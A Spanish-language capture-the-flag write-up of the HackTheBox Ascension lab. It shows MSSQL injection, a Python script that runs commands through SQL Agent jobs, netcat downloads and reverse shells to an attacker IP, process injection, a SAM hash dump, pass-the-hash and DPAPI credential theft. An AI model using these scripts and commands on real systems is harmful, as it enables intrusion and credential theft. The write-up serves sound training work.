xchg2pwn

xchg2pwn

Entusiasta del reversing y desarrollo de exploits


Contenido


HackTheBox

Ascension



Chasm

ASCENSION{y0ur_4gent_is_oUr_aG3n7}


Iniciamos la máquina escaneando los puertos de la máquina con nmap donde encontramos solo un puerto abierto, el 80 que es un servicio web por http

❯ nmap 10.13.38.20
Nmap scan report for 10.13.38.20  
PORT   STATE SERVICE
80/tcp open  http

Ya que es el unico puerto abierto podemos dar un vistazo a la web, la cual parece una página de aerolinas, en ella encontramos un boton para reservar un vuelo

En la pagina de reservacion podemos ingresar algunos datos para posibles vuelos

Al enviar una ' en el primer campo recibimos un error de Mssql, por lo que muy probablemente podriamos derivarlo a una sql injection aprovechando el error

Para ahorrar tiempo usaremos sqlmap, iniciaremos pasandole la data donde se tramita la vulnerabilidad y con el parametro -dbs dumpeamos los nombres de todas las bases de datos, sin embargo en ellas no encontramos nada muy intersante

❯ sqlmap --batch --url http://10.13.38.20/book-trip.php --data "destination=test" -dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.8#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[18:18:36] [INFO] resuming back-end DBMS 'microsoft sql server' 
[18:18:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: destination (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: destination=test' AND 5908 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5908=5908) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(106)+CHAR(113)))-- OSNd  

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: destination=test';WAITFOR DELAY '0:0:5'--

    Type: time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: destination=test' WAITFOR DELAY '0:0:5'-- DCiP
---
[18:18:37] [INFO] the back-end DBMS is Microsoft SQL Server
[18:18:37] [INFO] fetching database names
[18:18:38] [INFO] retrieved: 'daedalus'
[18:18:39] [INFO] retrieved: 'logs'
[18:18:39] [INFO] retrieved: 'master'
[18:18:40] [INFO] retrieved: 'model'
[18:18:40] [INFO] retrieved: 'msdb'
[18:18:41] [INFO] retrieved: 'tempdb'
available databases [6]:
[*] daedalus
[*] logs
[*] master
[*] model
[*] msdb
[*] tempdb

Con el parametro --users podemos dumpear los usuarios relacionados con la db

❯ sqlmap --batch --url http://10.13.38.20/book-trip.php --data "destination=test" --users  
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.8#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[14:24:47] [INFO] resuming back-end DBMS 'microsoft sql server' 
[14:24:47] [INFO] testing connection to the target URL
[14:24:48] [INFO] the back-end DBMS is Microsoft SQL Server
[14:24:48] [INFO] fetching database user'
database management system users [18]:
[*] ##MS_AgentSigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_SmoExtendedSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLResourceSigningCertificate##
[*] daedalus
[*] daedalus_admin
[*] NT AUTHORITY\\SYSTEM
[*] NT Service\\MSSQLSERVER
[*] NT SERVICE\\SQLSERVERAGENT
[*] NT SERVICE\\SQLTELEMETRY
[*] NT SERVICE\\SQLWriter
[*] NT SERVICE\\Winmgmt
[*] sa
[*] WEB01\\svc_dev

Para ejecutar nuestras propias querys y tener mas control sobre lo que ejecutamos usaremos --sql-shell que nos otorgara una consola para enviar las querys

❯ sqlmap --batch --url http://10.13.38.20/book-trip.php --data "destination=test" --sql-shell
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.8#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[18:19:09] [INFO] resuming back-end DBMS 'microsoft sql server' 
[18:19:09] [INFO] testing connection to the target URL
[18:19:10] [INFO] the back-end DBMS is Microsoft SQL Server
[18:19:10] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER  
sql-shell> select suser_name();
[18:22:19] [INFO] fetching SQL SELECT statement query output: 'select suser_name()'
[18:22:20] [INFO] retrieved: 'daedalus'
select suser_name(): 'daedalus'
sql-shell> host_name();
[18:25:12] [INFO] fetching SQL query output: 'host_name()'
[18:25:12] [INFO] retrieved: 'WEB01'
host_name(): 'WEB01'
sql-shell>

Como curiosidad aunque en este caso no nos sirve de nada si usamos xp_dirtree hacia un recurso smb podemos capturar el hash NTLMv2 de el equipo WEB01$

sql-shell> exec xp_dirtree '\\10.10.14.10\kali'
[18:23:48] [INFO] executing SQL data execution statement: 'exec xp_dirtree '\\10.10.14.10\kali''  
exec xp_dirtree '\\10.10.14.10\kali': 'NULL'
sql-shell>


❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.13.38.20,56583)
[*] AUTHENTICATE_MESSAGE (DAEDALUS\WEB01$,WEB01)
[*] User WEB01\WEB01$ authenticated successfully
[*] WEB01$::DAEDALUS:aaaaaaaaaaaaaaaa:dca15cfab9d811eed94ea3b3e412ac10:010100000000000000c24b936adcd9012f62a36cd4aedc85000000000100100055004200530064007a0071004e0042000300100055004200530064007a0071004e0042000200100068006d00580074005700450047006b000400100068006d00580074005700450047006b000700080000c24b936adcd90106000400020000000800300030000000000000000000000000300000d42bd6976d05dbb7e4b3b1ceef1292ea608ef946bcbe54d8b8726f58fb118d660a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0034000000000000000000  
[*] Closing down connection (10.13.38.20,56583)
[*] Remaining connections []

Creamos una tabla llamada roles con las columnas username y rolename en donde basandonos en la documentacion ingresaremos los nombres y roles de los miembros de la base de datos para despues dumpearlos y ver toda la informacion

sql-shell> create table roles ([username] sysname, [rolename] sysname)
[14:35:33] [INFO] executing SQL data definition statement: 'create table roles ([username] sysname, [rolename] sysname)'
create table roles ([username] sysname, [rolename] sysname): 'NULL'
sql-shell> insert into roles (username, rolename) select isnull (dp1.name, 'no members') as databaseusername, dp2.name as databaserolename from msdb.sys.database_role_members as drm left outer join msdb.sys.database_principals as dp1 on drm.member_principal_id = dp1.principal_id right outer join msdb.sys.database_principals as dp2 on drm.role_principal_id = dp2.principal_id where dp2.type = 'r' order by dp1.name
[14:35:34] [INFO] executing SQL data manipulation statement: 'insert into roles (username, rolename) select isnull (dp1.name, 'no members') as databaseusername, dp2.name as databaserolename from msdb.sys.database_role_members as drm left outer join msdb.sys.database_principals as dp1 on drm.member_principal_id = dp1.principal_id right outer join msdb.sys.database_principals as dp2 on drm.role_principal_id = dp2.principal_id where dp2.type = 'r' order by dp1.name'  
insert into roles (username, rolename) select isnull (dp1.name, 'no members') as databaseusername, dp2.name as databaserolename from msdb.sys.database_role_members as drm left outer join msdb.sys.database_principals as dp1 on drm.member_principal_id = dp1.principal_id right outer join msdb.sys.database_principals as dp2 on drm.role_principal_id = dp2.principal_id where dp2.type = 'r' order by dp1.name: 'NULL'
sql-shell>

Una vez ingresamos esos datos en la tabla roles dumpeamos la tabla roles y vemos algunas cosas entre ellas a daedalus_admin con el rol SQLAgentUserRole que si miramos la documentacion nos dice que tiene la capacidad de crear y ejecutar jobs

❯ sqlmap --batch --url http://10.13.38.20/book-trip.php --data "destination=test" -D daedalus -T roles -dump  
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.8#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Database: daedalus
Table: roles
[39 entries]
+------------------------------+-----------------------------------+
| rolename                     | username                          |
+------------------------------+-----------------------------------+
| public                       | No members                        |
| TargetServersRole            | No members                        |
| SQLAgentUserRole             | SQLAgentReaderRole                |
| SQLAgentUserRole             | dc_operator                       |
| SQLAgentUserRole             | MS_DataCollectorInternalUser      |
| SQLAgentUserRole             | daedalus_admin                    |
| SQLAgentUserRole             | WEB01\\svc_dev                    |
| SQLAgentReaderRole           | SQLAgentOperatorRole              |
| SQLAgentReaderRole           | daedalus_admin                    |
| SQLAgentReaderRole           | WEB01\\svc_dev                    |
| SQLAgentOperatorRole         | PolicyAdministratorRole           |
| SQLAgentOperatorRole         | daedalus_admin                    |
| SQLAgentOperatorRole         | WEB01\\svc_dev                    |
| DatabaseMailUserRole         | No members                        |
| db_ssisadmin                 | No members                        |
| db_ssisltduser               | dc_operator                       |
| db_ssisltduser               | dc_proxy                          |
| db_ssisoperator              | dc_operator                       |
| db_ssisoperator              | dc_proxy                          |
| db_ssisoperator              | MS_DataCollectorInternalUser      |
| dc_operator                  | dc_admin                          |
| dc_admin                     | MS_DataCollectorInternalUser      |
| dc_proxy                     | No members                        |
| PolicyAdministratorRole      | ##MS_PolicyEventProcessingLogin## |
| PolicyAdministratorRole      | ##MS_PolicyTsqlExecutionLogin##   |
| ServerGroupAdministratorRole | No members                        |
| ServerGroupReaderRole        | ServerGroupAdministratorRole      |
| UtilityCMRReader             | No members                        |
| UtilityIMRWriter             | No members                        |
| UtilityIMRReader             | UtilityIMRWriter                  |
| db_owner                     | dbo                               |
| db_accessadmin               | No members                        |
| db_securityadmin             | No members                        |
| db_ddladmin                  | No members                        |
| db_backupoperator            | No members                        |
| db_datareader                | No members                        |
| db_datawriter                | No members                        |
| db_denydatareader            | No members                        |
| db_denydatawriter            | No members                        |
+------------------------------+-----------------------------------+

Ahora enumeraremos usuarios a los que nuestro usuario actual pueda suplantar, para esto creamos una tabla grants donde depositaremos los nombres de usuario, esto podemos hacerlo facilmente ayudandonos de un articulo que nos explica

sql-shell> create table grants (username varchar(1024))
[14:39:19] [INFO] executing SQL data definition statement: 'create table grants (username varchar(1024))'
create table grants (username varchar(1024)): 'NULL'
sql-shell> insert into grants (username) select distinct b.name from sys.server_permissions a inner join sys.server_principals b on a.grantor_principal_id = b.principal_id where a.permission_name = 'impersonate'
[14:39:30] [INFO] executing SQL data manipulation statement: 'insert into grants (username) select distinct b.name from sys.server_permissions a inner join sys.server_principals b on a.grantor_principal_id = b.principal_id where a.permission_name = 'impersonate''  
insert into grants (username) select distinct b.name from sys.server_permissions a inner join sys.server_principals b on a.grantor_principal_id = b.principal_id where a.permission_name = 'impersonate': 'NULL'
sql-shell>

Dumpeamos la tabla grants y encontramos solo al usuario daedalus_admin, esto significa que podremos suplantar a este usuario para ejecutar nuestra query

❯ sqlmap --batch --url http://10.13.38.20/book-trip.php --data "destination=test" -D daedalus -T grants -dump  
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.8#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Database: daedalus
Table: grants
[1 entry]
+----------------+
| username       |
+----------------+
| daedalus_admin |
+----------------+

Solo para comprobar creamos una tabla llamada proxy donde depositaremos el resultado de la query sp_help_proxy ejecutada bajo el usuario daedalus_admin

sql-shell> create table proxy ([proxy_id] int, [name] sysname, [credential_identity] sysname, [enabled] tinyint, [description] nvarchar(1024), [user_sid] varbinary(85), [credential_id] int, [credential_identity_exists] int)
[14:42:28] [INFO] executing SQL data definition statement: 'create table proxy ([proxy_id] int, [name] sysname, [credential_identity] sysname, [enabled] tinyint, [description] nvarchar(1024), [user_sid] varbinary(85), [credential_id] int, [credential_identity_exists] int)'  
create table proxy ([proxy_id] int, [name] sysname, [credential_identity] sysname, [enabled] tinyint, [description] nvarchar(1024), [user_sid] varbinary(85), [credential_id] int, [credential_identity_exists] int): 'NULL'
sql-shell> exec as login = n'daedalus_admin'; insert into proxy exec msdb.dbo.sp_help_proxy
[14:42:47] [INFO] executing SQL data execution statement: 'exec as login = N'daedalus_admin'; insert into proxy exec msdb.dbo.sp_help_proxy'
exec as login = N'daedalus_admin'; insert into proxy exec msdb.dbo.sp_help_proxy: 'NULL'
sql-shell>

Dumpeamos la tabla proxy y como credencial podemos encontrar la de svc_dev que en su descripcion dice que tiene acceso a ejecutar CmdExec y Powershell

❯ sqlmap --batch --url http://10.13.38.20/book-trip.php --data "destination=test" -D daedalus -T proxy -dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.8#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

Database: daedalus
Table: proxy
[1 entry]
+----------+-------------------+---------------+---------+---------+-------------------------------------------------------------+---------------------+----------------------------+
| proxy_id | user_sid          | credential_id | name    | enabled | description                                                 | credential_identity | credential_identity_exists |
+----------+-------------------+---------------+---------+---------+-------------------------------------------------------------+---------------------+----------------------------+
| 1        | ?..?\x15.???????. | 65537         | svc_dev | 1       | Allow user to access the CmdExec and Powershell subsystems. | WEB01\\svc_dev      | 1                          |
+----------+-------------------+---------------+---------+---------+-------------------------------------------------------------+---------------------+----------------------------+

Apoyandonos de esta investigacion podemos crear un pequeño script en python que nos automatize una ejecucion de comandos solo a través de jobs donde sabemos que el usuario daedalus_admin que suplantamos tiene privilegios

#!/usr/bin/python3
import sys, random, string, requests

if len(sys.argv) < 2:
    print(f"Usage: python3 {sys.argv[0]} <command>")
    sys.exit(1)

command = sys.argv[1]
target = "http://10.13.38.20/book-trip.php"
name = "".join(random.choices(string.ascii_lowercase, k=8))

query = f"""
use msdb;
exec as login = N'daedalus_admin';
exec msdb.dbo.sp_add_job @job_name = N'{name}_job';
exec msdb.dbo.sp_add_jobstep @job_name = N'{name}_job', @step_name = N'{name}_step', @subsystem = N'cmdexec', @command = N'C:\\Windows\\System32\\cmd.exe /c {command}', @retry_attempts = 1, @retry_interval = 5, @proxy_id = 1;  
exec msdb.dbo.sp_add_jobserver @job_name = N'{name}_job';
exec msdb.dbo.sp_start_job @job_name = N'{name}_job';
"""

data = {"destination": f"'; {query}-- -"}
requests.post(target, data=data)

Para comprobar que funciona podemos enviar un simple curl y recibimos la peticion

❯ python3 exploit.py 'curl 10.10.14.10'  


❯ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...  
10.13.38.20 - - "GET / HTTP/1.1" 200 -

Queremos ganar acceso, iniciamos descargando el netcat.exe en C:\ProgramData la cual es una ruta donde todos los usuarios siempre tienen capacidad de escritura

❯ python3 exploit.py 'curl 10.10.14.10/netcat.exe -o C:\ProgramData\netcat.exe'  


❯ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...  
10.13.38.20 - - "GET /netcat.exe HTTP/1.1" 200 -

Finalmente llamamos a netcat.exe y nos enviamos una powershell, esta la recibimos como el usuario svc_dev en web01, ahi podemos leer la primera flag

❯ python3 exploit.py 'cmd /c C:\ProgramData\netcat.exe -e powershell 10.10.14.10 443'  


❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.20
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\System32> whoami
web01\svc_dev
PS C:\Windows\System32> type C:\Users\svc_dev\Desktop\flag.txt  
ASCENSION{y0ur_4gent_is_oUr_aG3n7}
PS C:\Windows\System32>


Intercept

ASCENSION{N0_c0mm@nd_1s_saf3}


Usamos inveigh para detectar trafico de todas peticiones que se hacen en esta red, en el output podemos encontrar algunas peticiones hacia fin01.daedalus.local

PS C:\ProgramData> curl 10.10.14.10/Inveigh.ps1 -o Inveigh.ps1
PS C:\ProgramData> Import-Module .\Inveigh.ps1
PS C:\ProgramData> Invoke-Inveigh -FileOutput Y
[*] Inveigh 1.506 started at 2023-09-02T22:06:41
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 10.13.38.20
[+] Spoofer IP Address = 10.13.38.20
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer = Disabled
[+] NBNS Spoofer = Disabled
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Capture = Disabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Disabled
[+] File Output = Enabled
[+] Output Directory = C:\ProgramData
Warning: [!] Run Stop-Inveigh to stop
PS C:\ProgramData> type Inveigh-Log.txt
[+] [2023-09-02T22:06:49] mDNS(QM) request fin01.local received from 10.13.38.20 [spoofer disabled]
[+] [2023-09-02T22:06:49] mDNS(QM) request fin01.local received from 10.13.38.20 [spoofer disabled]
[+] [2023-09-02T22:06:50] NBNS request for FIN01<20> received from 192.168.10.39 [spoofer disabled]
[+] [2023-09-02T22:06:50] NBNS request for FIN01<20> received from 192.168.10.39 [spoofer disabled]
[+] [2023-09-02T22:06:50] DNS request for fin01.daedalus.local sent to 192.168.10.6 [outgoing query]  
PS C:\ProgramData>

Puede que se trate de una tarea y aunque podriamos usar Seatbelt para enumerar las tareas antes necesitamos migrar a un proceso, para ello importamos Invoke-PSInject

PS C:\ProgramData> curl 10.10.14.10/Invoke-PSInject.ps1 -o Invoke-PSInject.ps1  
PS C:\ProgramData> Import-Module .\Invoke-PSInject.ps1
PS C:\ProgramData>

Ahora necesitamos un proceso, igual que en otros casos usaremos RunTimeBroker

PS C:\ProgramData> Get-Process RunTimeBroker

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    276      14     3348      15672       0.53   4992   1 RuntimeBroker  
    341      18    20332      33492       2.02   5952   1 RuntimeBroker  
    145       8     1764       7820       0.13   8184   1 RuntimeBroker  

PS C:\ProgramData>

Crearemos un payload en base64 que reutilizando el netcat nos envie una revshell

❯ echo -n 'cmd /c C:\\ProgramData\\netcat.exe -e powershell 10.10.14.10 443' | iconv -t utf16le | base64 -w0
YwBtAGQAIAAvAGMAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABuAGUAdABjAGEAdAAuAGUAeABlACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgADEAMAAuADEAMAAuADEANAAuADQAIAA0ADQAMwA=

Finalmente ejecutamos en el pid 4992 que pertenece al proceso RunTimeBroker nuestro payload en base64, como resultado recibimos una nueva powershell

PS C:\ProgramData> Invoke-PSInject -Procid 4992 -PoshCode YwBtAGQAIAAvAGMAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABuAGUAdABjAGEAdAAuAGUAeABlACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgADEAMAAuADEAMAAuADEANAAuADQAIAA0ADQAMwA=  
PS C:\ProgramData>


❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.20
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\System32> whoami
web01\svc_dev
PS C:\Windows\System32>

Bajo el contexto de este proceso si que podremos enumerar las tareas con Seatbelt, encontramos una llamada AutochkTask la cual intenta cargar lo que hay en \\fin01\invoices sin embargo en el propio comando nos muestra credenciales

PS C:\ProgramData> curl 10.10.14.10/Seatbelt.exe -o Seatbelt.exe
PS C:\ProgramData> .\Seatbelt.exe ScheduledTasks


                        %&&@@@&&                                                                                  
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%                         
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%  
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((  
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((  
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((  
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((  
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####  
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####  
#####%######################  %%%..                       @////(((&%%%%%%%################                        
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*                         
                        &%%&&&%%%%%        v1.2.1         ,(((&%%%%%%%%%%%%%%%%%,                                 
                         #%%%%##,                                                                                 

====== ScheduledTasks ======

Non Microsoft scheduled tasks (via WMI)

  Name                              :   Server Initial Configuration Task
  Principal                         :
      GroupId                       :   
      Id                            :   LocalSystem
      LogonType                     :   Service
      RunLevel                      :   TASK_RUNLEVEL_HIGHEST
      UserId                        :   SYSTEM
  Author                            :   $(@%systemroot%\system32\SrvInitConfig.exe,-100)
  Description                       :   $(@%systemroot%\system32\SrvInitConfig.exe,-101)
  Source                            :   
  State                             :   Disabled
  SDDL                              :   
  Enabled                           :   False
  Date                              :   1/1/0001 12:00:00 AM
  AllowDemandStart                  :   True
  DisallowStartIfOnBatteries        :   True
  ExecutionTimeLimit                :   PT72H
  StopIfGoingOnBatteries            :   True
  Actions                           :
      ------------------------------
      Type                          :   MSFT_TaskAction
      Arguments                     :   /disableconfigtask
      Execute                       :   %windir%\system32\srvinitconfig.exe
      ------------------------------
  Triggers                          :
      ------------------------------
      Type                          :   MSFT_TaskBootTrigger
      Enabled                       :   True
      StopAtDurationEnd             :   False
      ------------------------------

  Name                              :   AutochkTask
  Principal                         :
      GroupId                       :   
      Id                            :   Author
      LogonType                     :   1
      RunLevel                      :   TASK_RUNLEVEL_LUA
      UserId                        :   svc_dev
  Author                            :   DAEDALUS\Administrator
  Description                       :   
  Source                            :   
  State                             :   Ready
  SDDL                              :   
  Enabled                           :   True
  Date                              :   1/3/2020 3:34:29 AM
  AllowDemandStart                  :   True
  DisallowStartIfOnBatteries        :   True
  ExecutionTimeLimit                :   PT0S
  StopIfGoingOnBatteries            :   True
  Actions                           :
      ------------------------------
      Type                          :   MSFT_TaskAction
      Arguments                     :   net use E: \\fin01\invoices /user:billing_user D43d4lusB1ll1ngB055
      Execute                       :   powershell
      ------------------------------
  Triggers                          :
      ------------------------------
      Type                          :   MSFT_TaskTimeTrigger
      Enabled                       :   True
      StartBoundary                 :   2020-01-13T04:13:47
      Interval                      :   PT1M
      StopAtDurationEnd             :   False
      ------------------------------

PS C:\ProgramData>

Antes de seguir crearemos un proxy para poder tener conexion con los equipos del dominio, para esto podemos usar ligolo-ng usando el agent para conectarnos a nuestro equipo por el puerto 8888 el cual podemos indicar en el proxy

PS C:\ProgramData> curl 10.10.14.10/agent.exe -o agent.exe
PS C:\ProgramData> .\agent.exe -connect 10.10.14.10:8888 -ignore-cert

En el proxy obtenemos una sesión, la indicamos e iniciamos el tunel con start

❯ ,/proxy -selfcert -laddr 0.0.0.0:8888
WARN[0000] Using automatically generated self-signed certificates (Not recommended) 
INFO[0000] Listening on 0.0.0.0:8888                    
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

Made in France ♥ by @Nicocha30!

ligolo-ng » 
INFO[0076] Agent joined.           name="WEB01\\svc_dev@WEB01" remote="10.13.38.20:59528"  
ligolo-ng » session
? Specify a session : 1 - WEB01\svc_dev@WEB01 - 10.13.38.20:59528
[Agent : WEB01\svc_dev@WEB01] » start
INFO[0081] Starting tunnel to WEB01\svc_dev@WEB01       
[Agent : WEB01\svc_dev@WEB01] »

Agregamos el segmento 192.168.10.0/24 a la interfaz de ligolo y ahora tenemos conexión con todos los equipos del dominio, podemos comprobarlo con un ping

❯ sudo ip route add 192.168.10.0/24 dev ligolo

❯ ping -c1 -w1 192.168.10.39
PING 192.168.10.39 (192.168.10.39) 56(84) bytes of data.
64 bytes from 192.168.10.39: icmp_seq=1 ttl=64 time=177 ms

--- 192.168.10.39 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms  
rtt min/avg/max/mdev = 176.552/176.552/176.552/0.000 ms

Con crackmapexec usaremos un /24 para escanear todo el segmento, detectamos 2 equipos asociados al dominio daedalus.local y sus nombres son WEB01 y DC1

❯ crackmapexec smb 192.168.10.0/24
SMB         192.168.10.39   445    WEB01            [*] Windows Server 2019 Standard 17763 x64 (name:WEB01) (domain:daedalus.local) (signing:False) (SMBv1:True)  
SMB         192.168.10.6    445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:daedalus.local) (signing:True) (SMBv1:False)

Por comodidad y posibles proximos ataques agregaremos al archivo /etc/hosts las direcciones con su dominio que sera el hostname y el dominio daedalus.local

❯ echo "192.168.10.39 web01.daedalus.local" | sudo tee -a /etc/hosts

❯ echo "192.168.10.6 daedalus.local dc1.daedalus.local" | sudo tee -a /etc/hosts

Comprobamos las credenciales que encontramos en la tarea hacia el DC y son validas

❯ crackmapexec smb dc1.daedalus.local -u billing_user -p D43d4lusB1ll1ngB055
SMB         daedalus.local  445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:daedalus.local) (signing:True) (SMBv1:False)  
SMB         daedalus.local  445    DC1              [+] daedalus.local\billing_user:D43d4lusB1ll1ngB055

Volviendo a WEB01, si miramos los administradores locales encontramos al usuario billing_user a nivel de dominio, y este usuario es de quien tenemos la contraseña

PS C:\ProgramData> net localgroup Administrators

Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain  

Members

-------------------------------------------------------------------------------
Administrator
DAEDALUS\billing_user
DAEDALUS\Domain Admins
The command completed successfully.

PS C:\ProgramData>

Nuevamente comprobamos con crackmapexec pero hacia WEB01 y nos devuelve Pwn3d! por lo que tenemos privilegios maximos, asi que podemos dumpear la sam

❯ crackmapexec smb web01.daedalus.local -u billing_user -p D43d4lusB1ll1ngB055
SMB         web01.daedalus.local 445    WEB01            [*] Windows Server 2019 Standard 17763 x64 (name:WEB01) (domain:daedalus.local) (signing:False) (SMBv1:True)  
SMB         web01.daedalus.local 445    WEB01            [+] daedalus.local\billing_user:D43d4lusB1ll1ngB055 (Pwn3d!)

❯ crackmapexec smb web01.daedalus.local -u billing_user -p D43d4lusB1ll1ngB055 --sam
SMB         web01.daedalus.local 445    WEB01            [*] Windows Server 2019 Standard 17763 x64 (name:WEB01) (domain:daedalus.local) (signing:False) (SMBv1:True)  
SMB         web01.daedalus.local 445    WEB01            [+] daedalus.local\billing_user:D43d4lusB1ll1ngB055 (Pwn3d!)
SMB         web01.daedalus.local 445    WEB01            [*] Dumping SAM hashes
SMB         web01.daedalus.local 445    WEB01            Administrator:500:aad3b435b51404eeaad3b435b51404ee:568c606ed9511b9a10d7d026322e8521:::
SMB         web01.daedalus.local 445    WEB01            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         web01.daedalus.local 445    WEB01            DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         web01.daedalus.local 445    WEB01            WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:fb3ada79aa86ea85ffc477a12c27bea2:::
SMB         web01.daedalus.local 445    WEB01            svc_dev:1003:aad3b435b51404eeaad3b435b51404ee:c052d2a19169ce31d0b80ce67114a74e:::
SMB         web01.daedalus.local 445    WEB01            [+] Added 5 SAM hashes to the database

Ya con el hash del usuario Administrator podemos conectarnos con evil-winrm haciendo un passthehash y obtenemos una powershell donde leemos la flag

❯ evil-winrm -i web01.daedalus.local -u Administrator -H 568c606ed9511b9a10d7d026322e8521  
PS C:\Users\Administrator\Documents> whoami
web01\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
ASCENSION{N0_c0mm@nd_1s_saf3}
PS C:\Users\Administrator\Documents>


Contrails

ASCENSION{15nT_dPaP1_s3cuRe?}


Subimos SharpDPAPI para dumpear credenciales, para ello le pasearemos la contraseña que tenemos, asi obtenemos la contraseña del usuario svc_backup

PS C:\Users\Administrator\Documents> upload SharpDPAPI.exe

Info: Uploading SharpDPAPI.exe to C:\Users\Administrator\Documents\SharpDPAPI.exe

Data: 202752 bytes of 202752 bytes copied

Info: Upload successful!

PS C:\Users\Administrator\Documents> .\SharpDPAPI.exe credentials /password:D43d4lusB1ll1ngB055  

  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.11.3


[*] Action: User DPAPI Credential Triage

[*] Will decrypt user masterkeys with password: D43d4lusB1ll1ngB055

[*] Triaging Credentials for ALL users

Folder       : C:\Users\Administrator\AppData\Local\Microsoft\Credentials\

  CredFile           : 6C0FA35116FC27371A650B528FAEE6C0

    guidMasterKey    : {f77aed43-beff-4c38-805d-656a7bc7097a}
    size             : 560
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

